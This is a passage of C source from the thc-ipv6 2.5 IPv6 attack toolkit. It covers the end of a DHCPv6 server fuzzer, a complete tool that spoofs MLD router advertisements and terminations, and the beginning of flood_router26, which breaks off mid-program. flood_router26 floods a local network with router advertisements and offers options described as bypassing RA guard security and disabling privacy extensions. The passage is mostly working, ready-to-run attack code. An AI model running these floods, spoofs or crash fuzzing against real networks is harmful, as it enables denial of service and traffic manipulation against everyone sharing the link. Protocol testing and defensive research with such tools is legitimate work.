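number\n"); printf(" -n number how many times to send each packet (default: 1)\n"); printf(" -f spoof mac\n"); printf(" -F spoof link address\n"); printf(" -p number perform an alive check every number of tests (default: none)\n"); printf(" -d Use -d to force DNS updates, you can specify a domain name on the commandline.\n"); printf("You can only define one of -0 ... -4, defaults to -1.\n"); printf("Returns -1 on error, 0 on tests done and targt alive or 1 on target crash.\n"); exit(-1); } char dnsupdate1[] = { 0, 39, 0, 8, 1, 6, 122, 97, 97, 97, 97, 97 }; char dnsupdate2[] = { 0, 6, 0, 2, 0, 39 }; char dns_option_hdr[256]; int dns_option_hdr_len = 0; char fuzzbuf[256]; char *interface = NULL, *dns_name = NULL, elapsed[6] = { 0, 8, 0, 2, 0, 0 }; int do_dns = 0, test_start = 0, test_end = TEST_MAX, ping = NEVER, no_send = 1, got_packet = 0; pcap_t *p = NULL; int do_type = DO_SOL, fuzz_msg_type = 0; int timeout = 4; void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { return; }

/*
 * Send pkt on interface, retrying until thc_send_pkt() succeeds or the global
 * `timeout` (seconds) has passed.
 * Returns 0 once the packet was sent; prints an error and exits the program
 * when no send succeeded within the timeout.
 */
int try_send_pkt(char *interface, char *pkt, int *pkt_len) {
  int retry_send = 1;
  time_t start_time = time(NULL);

  while (time(NULL) - start_time < timeout && retry_send) {
    if (thc_send_pkt(interface, pkt, pkt_len) < 0)
      retry_send = 1;
    else
      retry_send = 0;
  }
  if (retry_send) {
    fprintf(stderr, "Timeout error: Unable to send check alive packet within timeout\n");
    exit(-1);
  }
  return 0;                     // declared int: previously control fell off the end without a value
}

/*
 * Liveness probe: sends a DHCPv6 solicit built from the `solicit` template to
 * ff02::1:2 and waits up to `timeout` seconds for a packet on capture handle p.
 * Returns 1 when a packet was captured in time, 0 on timeout.
 * Exits the program when the probe packet cannot be built or sent.
 *
 * Caveat: every packet delivered by p counts as a reply. The callback
 * (ignoreit) discards the data without looking at the sender or the
 * transaction id, so a reply from another DHCPv6 server on the link is
 * indistinguishable from a reply of the server under test.
 */
int check_alive(pcap_t * p) {
  // ret: -2 = waiting, nothing resent yet; -1 = solicit resent once; 0 = timed out; 1 = packet seen
  int ret = -2, len, pkt_len = 0, i;
  time_t t;
  char wdatabuf[1024];
  char *pkt = NULL;
  unsigned char *dst = thc_resolve6("ff02::1:2");
  unsigned char *mac6 = thc_get_own_mac(interface);

  // both helpers report failure with NULL; mac6 is handed to memcpy() below
  if (dst == NULL || mac6 == NULL) {
    fprintf(stderr, "Error: could not resolve ff02::1:2 or read the mac address of interface %s\n", interface);
    exit(-1);
  }

  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
  // (the loop randomises three bytes starting at each of the offsets 1, 18 and 32)
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 1] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    wdatabuf[i + 32] = rand() % 256;
  }
  memcpy(wdatabuf + 22, mac6, 6);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 1, 0, 0, 0, 0)) == NULL) {
    fprintf(stderr, "Error: Failed to create check allive ivp6 packet header\n");
    exit(-1);
  }
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) {
    fprintf(stderr, "Error: Failed to create check allive udp packet header\n");
    exit(-1);
  }
  if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) {
    fprintf(stderr, "Error: Failed to create check allive packet header\n");
    exit(-1);
  }
  // debug = 1;

  //Empty packet capture queue
  while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0);

  //Send initial solicit request
  try_send_pkt(interface, pkt, &pkt_len);

  //Check for response in loop and timeout if we don't get one
  t = time(NULL);
  while (ret < 0) {
    //Got reply packet; server alive!
    if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
      ret = 1;

    //If we still haven't received a packet after 1 second resend the solicit
    if (time(NULL) > t + 1 && ret == -2) {
      //Don't want to use try_send_pkt as it could take longer than timeout
      if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
        usleep(75);
        thc_send_pkt(interface, pkt, &pkt_len);  //Retry sending packet after short time if sending failed
      }
      ret = -1;
    }

    //Fail once `timeout` seconds have passed without a packet
    if (time(NULL) > t + timeout && ret < 0)
      ret = 0;
  }

  if (ret == 0) {
    fprintf(stderr, "Timeout: Failed to receive dhcp solicitation replay in check alive function within %d seconds\n", timeout);
  }
  // debug = 0;
  thc_destroy_packet(pkt);
  return ret > 0 ? 1 : 0;
}

int fuzz_loop(char* pkt, int* pkt_len) { int do_fuzz = 1; int test_pos = 0, test_ptr = 0, test_cnt = 0, test_current = 0; int do_it; int i; unsigned short int *sip; unsigned int *intp; int fragment = 0, frag_offset = 0; unsigned char *pkt_bak; thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; // backup of generated packet pkt_bak = malloc(hdr->pkt_len); memcpy(pkt_bak, hdr->pkt, hdr->pkt_len); printf("Fuzzing packet, starting at fuzz case %d, ending at fuzz case %d:\n", test_start, test_end); printf("fuzzbuf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); while (do_fuzz) { if (test_cnt == 0) while (fuzzbuf[test_ptr] == '.') { test_ptr++; test_pos++; } if (fuzzbuf[test_ptr] == 0) do_fuzz = 0; test_cnt++; do_it = 1; switch (fuzzbuf[test_ptr]) { case 0: break; case 'X': if (test_cnt <= COUNT_EXTEND) { if (pkt_bak[test_pos] != extends[test_cnt - 1]) hdr->pkt[test_pos] = extends[test_cnt - 1]; else do_it = 0; } else { test_cnt = 0; test_ptr++; test_pos++; } break; case 'B': if (test_cnt <= COUNT_BYTE) { if (pkt_bak[test_pos] != bytes[test_cnt - 1]) hdr->pkt[test_pos] = bytes[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_BYTE && do_it) { if (bytes[i] == pkt_bak[test_pos]) do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_BYTE + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'F': if (test_cnt <= COUNT_FLAG) { if (pkt_bak[test_pos] != flags[test_cnt - 1]) hdr->pkt[test_pos] = flags[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_FLAG && do_it) { if (bytes[i] == pkt_bak[test_pos]) // yes, bytes[] is the right one even for flags do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_FLAG + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'W': sip = (unsigned short int *) &pkt_bak[test_pos]; if (test_cnt <= COUNT_WORD) { if (*sip != words[test_cnt - 1]) memcpy((char *) 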
&hdr->pkt[test_pos], (char *) &words[test_cnt - 1], 2); else do_it = 0; } else { i = 0; while (i < COUNT_WORD && do_it) { if (words[i] == *sip) do_it = 0; i++; } if (do_it) { i = *sip ^ xors[test_cnt - COUNT_WORD - 1]; sip = (unsigned short int *) &hdr->pkt[test_pos]; *sip = i % 65536; } } if (test_cnt == COUNT_WORD + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos += 2; } break; case 'D': intp = (unsigned int *) &pkt_bak[test_pos]; if (test_cnt <= COUNT_DWORD) { if (*intp != dwords[test_cnt - 1]) memcpy((char *) &hdr->pkt[test_pos], (char *) &dwords[test_cnt - 1], 4); else do_it = 0; } else { i = 0; while (i < COUNT_DWORD && do_it) { if (dwords[i] == *intp) do_it = 0; i++; } if (do_it) { i = *intp ^ xors[test_cnt - COUNT_DWORD - 1]; intp = (unsigned int *) &hdr->pkt[test_pos]; *intp = (unsigned int) i; // *intp = (unsigned int) (i % 4294967295); } } if (test_cnt == COUNT_DWORD + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos += 4; } break; default: fprintf(stderr, "This character should not be in the fuzz string, shoot the programmer: %c(%d) position %d string %s\n", fuzzbuf[test_ptr], fuzzbuf[test_ptr], test_ptr, fuzzbuf); return -1; break; } if (do_it && do_fuzz) { if (test_current >= test_start && test_current <= test_end && do_fuzz) { printf("[%s] pos[%d]=%c -> %d | pkt[%d] | %d (%d=>%d)| \n", /*fuzzbuf*/"", test_ptr, fuzzbuf[test_ptr], test_cnt, test_pos, test_current, test_start, test_end); // Generate new transaction id int three_byte_test_current = test_current % 0x1000000; memcpy(hdr->pkt + 63, (char *) &three_byte_test_current, 3); // Regenerate UDP checksum hdr->pkt[60] = 0; hdr->pkt[61] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_UDP, &hdr->pkt[54], hdr->pkt_len - 54); hdr->pkt[60] = i / 256; hdr->pkt[61] = i % 256; // send packets int k; for (k = 0; k < no_send; k++) { while(thc_send_pkt(interface, pkt, pkt_len) < 0) usleep(1); } // printf("."); usleep(250); // TODO: Server up check if ((test_current - test_start) % ping == 
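0 && test_current != 0 && test_start != test_current) if (check_alive(p) == 0) { i = ((((test_current - test_start) / ping) - 1) * ping) + test_start + 1; printf("\nResult: target %s crashed during fuzzing, offending test case no. could be %d to %d\n", thc_ipv62notation(hdr->final_dst), i < 0 ? 0 : i, test_current); exit(1); } } // reset to basic packet memcpy(hdr->pkt, pkt_bak, hdr->pkt_len); test_current++; } } }

/*
 * Bounded append of a fuzz mask string to the global fuzzbuf.
 * Returns 0 on success, or -1 (fuzzbuf unchanged) when the mask plus its
 * terminating NUL would not fit.
 */
static int fuzzbuf_append(const char *mask) {
  size_t used = strlen(fuzzbuf), add = strlen(mask);

  if (add >= sizeof(fuzzbuf) - used)
    return -1;
  memcpy(fuzzbuf + used, mask, add + 1);        // copies the terminating NUL as well
  return 0;
}

/*
 * Append `count` 'B' (byte) markers to fuzzbuf; a count <= 0 appends nothing.
 * Returns 0 on success, -1 as soon as one marker no longer fits.
 */
static int fuzzbuf_append_bytes(int count) {
  while (count-- > 0)
    if (fuzzbuf_append("B") < 0)
      return -1;
  return 0;
}

/*
 * pcap callback: takes a captured DHCPv6 message of type 2, copies its
 * transaction id and selected options (client identifier, server identifier,
 * IA_NA, optionally FQDN) into a new message of the type chosen by do_type,
 * extends the fuzz mask to match and hands the packet to fuzz_loop().
 *
 * The capture is untrusted input. Every option is checked against the
 * remaining capture length, against the free space in mybuf and against the
 * free space in fuzzbuf before it is copied; a packet that fails a check is
 * dropped. The original code copied with memcpy()/strcat() without these
 * limits, so an oversized advertisement could write past mybuf[1024] and
 * fuzzbuf[256].
 *
 * foo is unused. Exits the program when do_type is not a handled message type
 * or when the new packet cannot be built or fuzzed.
 */
void construct_from_adv_and_fuzz(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  int len = header->caplen, pkt_len = 0, mlen = 10, olen;
  unsigned char *ptr = (unsigned char *) data, *pkt = NULL;
  char mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e };
  char *smac = mac;             // default source mac; was left uninitialised when no client identifier option was seen
  char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 };
  int done_dns = 0, copy_option, fits;

  //Set message type
  switch (do_type) {
  case DO_REQ:
    mybuf[0] = 0x03;
    break;
  case DO_CON:
    mybuf[0] = 0x04;
    break;
  case DO_REN:
    mybuf[0] = 0x05;
    break;
  case DO_REL:
    mybuf[0] = 0x08;
    break;
  case DO_DEC:
    mybuf[0] = 0x09;
    break;
  case DO_INF:
    mybuf[0] = 0x0B;
    break;
  default:
    fprintf(stderr, "Error: Unknown do type %d\n", do_type);
    exit(-1);
    break;
  }

  //Skip over header to dhcp header
  if (do_hdr_size) {
    data += do_hdr_size;
    len -= do_hdr_size;
    if (len < 1 || (data[0] & 240) != 0x60)     // check the length before reading the version nibble
      return;
  } else {
    data += 14;
    len -= 14;
  }
  // data[6] is compared with NXT_UDP and data[48] (40 + 8 bytes further) with message type 2
  if (len < 126 || data[6] != NXT_UDP || data[48] != 2)
    return;
  data += 48;
  len -= 48;

  //Copy transaction id and skip to message options
  memcpy(mybuf + 1, data + 1, 3);
  data += 4;
  len -= 4;

  //Begin fuzz buffer - only after the packet was accepted, so that ignored
  //packets no longer leave an extra mask appended to fuzzbuf
  if (fuzzbuf_append(fuzztype_elapsed_time) < 0)
    len = -1;

  //Loop over options till reach end of header
  while (len >= 4) {
    //Option length without the 4 bytes of the option type and option length fields
    olen = data[2] * 256 + data[3];
    if (olen > len - 4) {
      printf("Information: evil packet received\n");
      len = -1;
      break;
    }

    //Options 1-3 are copied, except the server identifier for confirm and
    //IA_NA for information request messages; option 39 only with do_dns.
    //Only the low byte of the option code is looked at.
    copy_option = (data[1] >= 1 && data[1] <= 3 && !(data[1] == 2 && do_type == DO_CON) && !(data[1] == 3 && do_type == DO_INF))
      || (data[1] == 39 && do_dns);

    if (copy_option) {
      //Refuse options that do not fit into what is left of mybuf
      if (olen + 4 > (int) sizeof(mybuf) - mlen) {
        printf("Information: evil packet received\n");
        len = -1;
        break;
      }
      memcpy(mybuf + mlen, data, olen + 4);

      switch (data[1]) {
      case 1:                  //client identifier
        //point smac at the client mac inside the packet
        //(offset 12 of a 14 byte option - presumably a link-layer based DUID, confirm)
        if (olen == 14)
          smac = (char *) (data + 12);
        else
          smac = mac;
        fits = fuzzbuf_append(fuzztype_client_identifier);
        break;
      case 2:                  //server identifier
        fits = fuzzbuf_append(fuzztype_server_identifier);
        break;
      case 3:                  //IA_NA + IA Address
        fits = fuzzbuf_append(fuzztype_IA_NA);
        if (fits == 0 && olen > 12)
          fits = fuzzbuf_append(fuzztype_IA_Address);
        break;
      default:                 //39, dns option
        if (olen > 0)
          mybuf[mlen + 4] = 1;  // force server to write dns entry
        fits = fuzzbuf_append(fuzztype_FQDN);
        if (fits == 0)
          fits = fuzzbuf_append_bytes(olen - 1);        //Fuzz the domain name string
        if (fits == 0)
          fits = fuzzbuf_append(fuzztype_option_request);
        //Make sure we don't add dns twice
        done_dns = 1;
        break;
      }
      mlen += olen + 4;

      if (fits < 0) {           // the fuzz mask for this packet would overflow fuzzbuf
        printf("Information: evil packet received\n");
        len = -1;
        break;
      }
    }

    data += olen + 4;
    len -= olen + 4;
  }

  //Add saved dns option onto this packet
  if (len >= 0 && do_dns && !done_dns) {
    if (dns_option_hdr_len > (int) sizeof(mybuf) - mlen) {
      printf("Information: evil packet received\n");
      len = -1;
    } else {
      memcpy(mybuf + mlen, dns_option_hdr, dns_option_hdr_len);
      mlen += dns_option_hdr_len;
      //Append dns fuzzing
      olen = (unsigned char) dns_option_hdr[2] * 256 + (unsigned char) dns_option_hdr[3];
      if (fuzzbuf_append(fuzztype_FQDN) < 0 || fuzzbuf_append_bytes(olen - 1) < 0     //Fuzz the domain name string
          || fuzzbuf_append(fuzztype_option_request) < 0) {
        printf("Information: evil packet received\n");
        len = -1;
      }
    }
  }

  //Build and send fuzzed message packets
  if (len >= 0) {
    unsigned char *dst = thc_resolve6("ff02::1:2");

    // NOTE(review): ptr + 38 and ptr + 6 are offsets from the start of the
    // capture and look like they assume a 14 byte link header even when
    // do_hdr_size is set - confirm
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ptr + 38, dst, 1, 0, 0, 0, 0)) == NULL) {
      fprintf(stderr, "Error: Couldn't create dhcp requests ipv6 header\n");
      exit(-1);
    }
    if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0) {
      fprintf(stderr, "Error: Couldn't create dhcp requests udp header\n");
      exit(-1);
    }
    if (thc_generate_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0) {
      fprintf(stderr, "Error: Couldn't create dhcp requests ethernet header\n");
      exit(-1);
    }
    if (fuzz_loop(pkt, &pkt_len) < 0) {
      fprintf(stderr, "Error: Fuzzing request packet failed\n");
      exit(-1);
    } else {
      got_packet = 1;           //Used to suppress timeout error
    }
    pkt = thc_destroy_packet(pkt);
  }

  //Truncate the fuzz buffer back to its original length
  //(66 = 14 + 40 + 8 + 4 mask characters for the ethernet, ipv6, udp and dhcpv6 headers)
  fuzzbuf[66] = 0;
  // printf("Trunc fuzzbuf: %s\n", fuzzbuf);
}

int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; // defines mac as 6 pieces and defines pkt as null. char wdatabuf[1024]; //builds data buffer and sets memory size at 1024mb unsigned char *mac6 = mac, *src, *dst; //creates mac6 address usuing int i, s, len, pkt_len = 0, dlen = 0; int do_all = 1, use_real_mac = 1, use_real_link = 1; int state; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); //Parse options while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) { switch (i) { case '1': do_type = DO_SOL; break; case '2': do_type = DO_REQ; break; case '3': do_type = DO_CON; break; case '4': do_type = DO_REN; break; case '5': do_type = DO_REB; break; case '6': do_type = DO_REL; break; case '7': do_type = DO_DEC; break; case '8': do_type = DO_INF; break; case 'm': fuzz_msg_type = 1; break; case 'n': no_send = atoi(optarg); break; case 't': test_start = atoi(optarg); break; case 'e': test_end = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'F': 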
use_real_link = 0; // no break case 'f': use_real_mac = 0; break; case 'p': ping = atoi(optarg); break; case 'd': do_dns = 1; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } //Check options if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (test_end < test_start) { printf("dont fuck up the command line options!\n"); exit(-1); } memset(mac, 0, sizeof(mac)); interface = argv[optind]; dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) { mac6 = thc_get_own_mac(interface); memcpy(mac, mac6, sizeof(mac)); } dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } //Establish state if (do_type == DO_SOL || do_type == DO_REB) state = STATELESS; else state = STATEFULL; // generate full fuzz mask for stateless types and partial for statefull types strcpy(fuzzbuf, fuzztype_ether); strcat(fuzzbuf, fuzztype_ip6); strcat(fuzzbuf, fuzztype_udp); if (fuzz_msg_type) strcat(fuzzbuf, fuzztype_dhcp6); else strcat(fuzzbuf, fuzztype_dhcp6no); if (state == STATELESS) { strcat(fuzzbuf, fuzztype_elapsed_time); strcat(fuzzbuf, fuzztype_client_identifier); strcat(fuzzbuf, fuzztype_IA_NA); if (do_dns) strcat(fuzzbuf, fuzztype_FQDN); } /** Generate packet **/ len = sizeof(solicit); memcpy(wdatabuf, solicit, len); //Add dns option if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1)); dlen = len 
+ 8; len += sizeof(dnsupdate1); dns_option_hdr_len += sizeof(dnsupdate1); //Append domain string prefix fuzz mask if (state == STATELESS) { //<-- Do fuzzbuffer later for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix strcat(fuzzbuf, "B"); } if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; dns_option_hdr_len += strlen(dns_name) + 1; //Append variable length domain string suffix fuzz mask if (state == STATELESS) { for (i = 0; i < strlen(dns_name) + 1; ++i) strcat(fuzzbuf, "B"); } } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); dns_option_hdr_len += sizeof(dnsupdate2); //Append option request (FQDN request) fuzz mask if (state == STATELESS){ strcat(fuzzbuf, fuzztype_option_request); } } //Set message type if (state == STATELESS) { switch (do_type) { case DO_SOL: wdatabuf[0] = 0x01; break; case DO_REB: wdatabuf[0] = 0x06; break; default: break; } } //random src mac if (!use_real_link) for (i = 0; i < 8; i++) src[i + 8] = rand() % 256; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 1] = rand() % 256; wdatabuf[i + 18] = rand() % 256; wdatabuf[i + 32] = rand() % 256; if (!use_real_mac) { mac[i * 2] = rand() % 256; mac[i * 2 + 1] = rand() % 256; } if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } memcpy(wdatabuf + 22, mac, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_pkt(interface, mac6, 
NULL, pkt, &pkt_len) < 0) return -1; //Fuzz solicit packet if (state == STATELESS) { if (fuzz_loop(pkt, &pkt_len) < 0) return -1; } //Fuzz request, confirm or renew paket else if (state == STATEFULL) { //Send a dhcp solicit to discover dhcpv6 servers if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Failed to send initial solicit packet\n"); return -1; } usleep(75); //<-- I don't really know why this is neccessary but it seems to be //Construct and fuzz packets using server identifier got_packet = 0; time_t start_time = time(NULL); while(time(NULL) - start_time < timeout) { while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function if (got_packet) break; } if (!got_packet) fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n"); } pkt = thc_destroy_packet(pkt); // printf("fuzzbuf: %s\n", fuzzbuf); return 0; } thc-ipv6-2.5/fake_mldrouter6.c0000644000000000000000000000764312251022435014761 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int rawmode = 0; int empty = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-l] interface advertise|solicitate|terminate [own-ip [own-mac-address]]\n\n", prg); printf("Announce, delete or soliciated MLD router - sourself or others.\n"); printf("Use -l to loop and send (in 5s intervals) until Control-C is pressed.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ptr = (unsigned char *) data; int len = header->caplen; if (rawmode == 0) { if (do_hdr_size) { ptr += do_hdr_size; len -= do_hdr_size; if ((ptr[0] & 240) != 0x60) return; } else { ptr += 14; len -= 14; } } if (debug) thc_dump_data(ptr, len, "Received Packet"); if (len > 43 && ptr[6] == 
0x3a && ptr[40] == ICMP6_MLD_ROUTERADV) printf("MLD router advertisement: %s is performing MLD routing\n", thc_ipv62notation(ptr + 8)); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[4]; unsigned char *dst6 = thc_resolve6("ff02:0:0:0:0:0:0:6a"), *src6 = NULL, srcmac[16] = "", *mac = srcmac; int pkt1_len = 0; char *interface, string[64] = "icmp6"; int ttl = 1, mode = 0, wait1 = 0, wait2 = 0, loop = 0; pcap_t *p; memset(buf, 0, sizeof(buf)); if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-l") == 0) { loop = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if (strncasecmp(argv[2], "sol", 3) == 0 || strncasecmp(argv[2], "que", 3) == 0) mode = ICMP6_MLD_ROUTERSOL; if (strncasecmp(argv[2], "ad", 2) == 0) { mode = ICMP6_MLD_ROUTERADV; wait1 = 15; wait2 = 0x00300006; } if (strncasecmp(argv[2], "ter", 3) == 0 || strncasecmp(argv[2], "del", 3) == 0) mode = ICMP6_MLD_ROUTERTERMINATION; if (mode == 0) { fprintf(stderr, "Error: no mode defined, specify solitate, advertise or terminate\n"); exit(-1); } if (argc < 4 || argv[3] == NULL || argv[3][0] == 0) src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK); else src6 = thc_resolve6(argv[3]); if (argc == 5 && argv[4] != NULL && argv[4][0] != 0) sscanf(argv[4], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, 
&pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt1, &pkt1_len, mode, wait1 % 256, wait2, (unsigned char *) &buf, 0, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending packet%s to %s%s\n", loop ? "s" : "", argv[2], loop ? " (Press Control-C to end)" : ""); do { thc_send_pkt(interface, pkt1, &pkt1_len); sleep(5); if (mode == ICMP6_MLD_ROUTERSOL) while (thc_pcap_check(p, (char *) check_packets, NULL)); } while (loop); return 0; // never reached } thc-ipv6-2.5/flood_router26.c0000644000000000000000000001725512251022437014545 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] [-sSG] [-RPA] interface [target]\n\n", prg); printf("Flood the local network with router advertisements.\n"); printf("Each packet contains ~25 prefix and route enries\n"); printf("Modes:\n"); printf(" default sends both routing entries and prefix information\n"); printf(" -R does only send routing entries, no prefix information\n"); printf(" -P does only send prefix information, no routing entries\n"); printf(" -A an attack to disable privacy extensions\n"); printf("Options:\n"); printf(" -H add a hopbyhop header to bypass RA guard security\n"); printf(" -F add an atomic fragment header to bypass RA guard security\n"); printf(" -D add a large destination header to bypass RA guard security\n"); printf(" -s use small lifetimes, resulting in a more devasting impact\n"); printf(" -S performs a slow start, which can increases the impact\n"); printf(" -G gigantic packet of 64kb of prefix/route entries\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char *buf, buf2[6], 
buf3[1504]; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst); int size, mtu, i, j, k, type = NXT_ICMP6, route_only = 0, prefix_only = 0, offset = 14; unsigned char *pkt = NULL; int pkt_len = 0, rawmode = 0, count = 0, deanon = 0, do_hop = 0, do_frag = 0, do_dst = 0, bsize = -1; int cnt, until = 0, lifetime = 0x00ff0100, mfoo, slow = 0; thc_ipv6_hdr *hdr = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "DFHRPArsSG")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 's': lifetime = 0x03000000; break; case 'S': slow = 16; break; case 'G': bsize = 65488; break; case 'A': deanon = 1; prefix_only = 1; cnt = 5; until = 256; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 'R': route_only = 1; break; case 'P': prefix_only = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (prefix_only && route_only) { fprintf(stderr, "Error: -P/-A and -R can not be specified together!\n"); exit(-1); } if (bsize == -1) { bsize = thc_get_mtu(argv[optind]) - 40; if (bsize < 1240 || bsize > 1460) { fprintf(stderr, "Error: invalid MTU on interface %s: %d\n", argv[optind], thc_get_mtu(argv[optind])); exit(-1); } } if (argc - optind > 1) if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]); exit(-1); } if ((buf = malloc(bsize)) == NULL) { fprintf(stderr, "Error: malloc() failed\n"); exit(-1); } if (deanon == 0) { i = 0; if (prefix_only == 0) i += 24; if (route_only == 0) i += 32; //printf("i %d route %d prefix %d\n", i, prefix_only, route_only); cnt = (bsize - 32 - (do_hop + do_dst + do_frag) * 8) / i; } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); 
